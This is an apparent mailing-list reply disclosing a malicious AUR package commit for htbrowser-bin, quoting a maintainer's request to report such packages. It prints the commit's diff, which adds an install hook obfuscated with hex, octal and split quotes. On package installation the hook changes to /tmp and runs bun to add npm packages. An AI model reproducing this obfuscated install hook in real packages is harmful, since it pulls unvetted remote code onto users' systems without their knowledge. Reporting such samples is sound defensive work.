There's a new wave (detected using my local Gemma E2B model FWIW).
It's a little bit more elaborate:
https://aur.archlinux.org/cgit/aur.git/commit/?h=htbrowser-bin&id=462c21877fe6d2f563ed6620ef227e06ac8c51c8
diff --git a/htbrowser-bin-deps.install b/htbrowser-bin-deps.install
new file mode 100644
index 000000000000..9806501accad
--- /dev/null
+++ b/htbrowser-bin-deps.install
@@ -0,0 +1,3 @@
+post_install() {
+ $'\x63'"d" "/"'t'"m"'p' && "b"'u''n' 'a'"d"'d'
$'\141\x6e''s'"i""-"$'\143''o''l''o''r'$'\x73'
'n'"e"'x'"t""f"'i''l''e''-''j''s'
+}
On Fri, 12 Jun 2026 at 01:47, Jonathan Grotelüschen
<[email protected]> wrote:
>
> Hi everyone,
>
> we’re working hard to reset/delete all malicious commits and ban the
> accounts.
>
> If you find more malicious packages, please **send them as a reply to
> this email** to keep them all in one thread.
>
> Thanks!
>
> --
> tippfehlr